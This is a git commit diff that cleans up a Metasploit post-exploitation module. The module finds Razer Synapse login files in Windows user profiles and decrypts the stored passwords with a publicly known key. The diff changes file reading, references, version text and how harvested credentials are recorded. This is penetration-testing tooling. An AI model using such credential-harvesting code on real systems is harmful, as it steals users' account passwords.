module razer_synapse cleanup

2013-01-17 16:53:00 +01:00 · 2013-01-17 16:53:00 +01:00 · 09b4a09ce1
parent 99296006c1
commit 09b4a09ce1
1 changed files with 11 additions and 9 deletions
--- a/modules/post/windows/gather/credentials/razer_synapse.rb
+++ b/modules/post/windows/gather/credentials/razer_synapse.rb
@ -15,6 +15,7 @@ class Metasploit3 < Msf::Post

 	include Msf::Post::Common
 	include Msf::Post::Windows::UserProfiles
+	include Msf::Post::File

 	def initialize(info={})
 		super(update_info(info,
@ -23,7 +24,7 @@ class Metasploit3 < Msf::Post
 					This module will enumerate passwords stored by the Razer Synapse
 					client. The encryption key and iv is publicly known. This module
 					will not only extract encrypted password but will also decrypt
-					password using public key. Affects version 1.7.15 and earlier.
+					password using public key. Affects versions earlier than 1.7.15.
 				},
 			'License'        => MSF_LICENSE,
 			'Author'         =>
@ -32,9 +33,13 @@ class Metasploit3 < Msf::Post
 					'Matt Howard "pasv" <themdhoward[at]gmail.com>', #PoC
 					'Brandon McCann "zeknox" <bmccann[at]accuvant.com>'
 				],
+			'References'    =>
+				[
+					[ 'URL', 'http://www.pentestgeek.com/2013/01/16/hard-coded-encryption-keys-and-more-wordpress-fun/' ],
+					[ 'URL', 'https://github.com/pasv/Testing/blob/master/Razer_decode.py' ]
+				],
 			'SessionTypes'   => [ 'meterpreter' ],
-			'Platform'      => [ 'win' ],
-
+			'Platform'      => [ 'win' ]
 		))
 	end

@ -61,7 +66,7 @@ class Metasploit3 < Msf::Post
 	def store_creds(user, pass)
 		if db
 			report_auth_info(
-				:host   => client.sock.peerhost,
+				:host   => Rex::Socket.resolv_to_dotted("www.razerzone.com"),
 				:port   => 443,
 				:ptype  => 'password',
 				:sname  => 'razer_synapse',
@ -98,13 +103,10 @@ class Metasploit3 < Msf::Post
 		grab_user_profiles().each do |user|
 			if user['LocalAppData']
 				accounts = user['LocalAppData'] + "\\Razer\\Synapse\\Accounts\\RazerLoginData.xml"
-				# open the file for reading
-				config = client.fs.file.new(accounts, 'r') rescue nil
-				next if config.nil?
+				next if not file?(accounts)
 				print_status("Config found for user #{user['UserName']}")

-				contents = config.read
-				config.close
+				contents = read_file(accounts)

 				# read the contents of file
 				creds = parse_config(contents)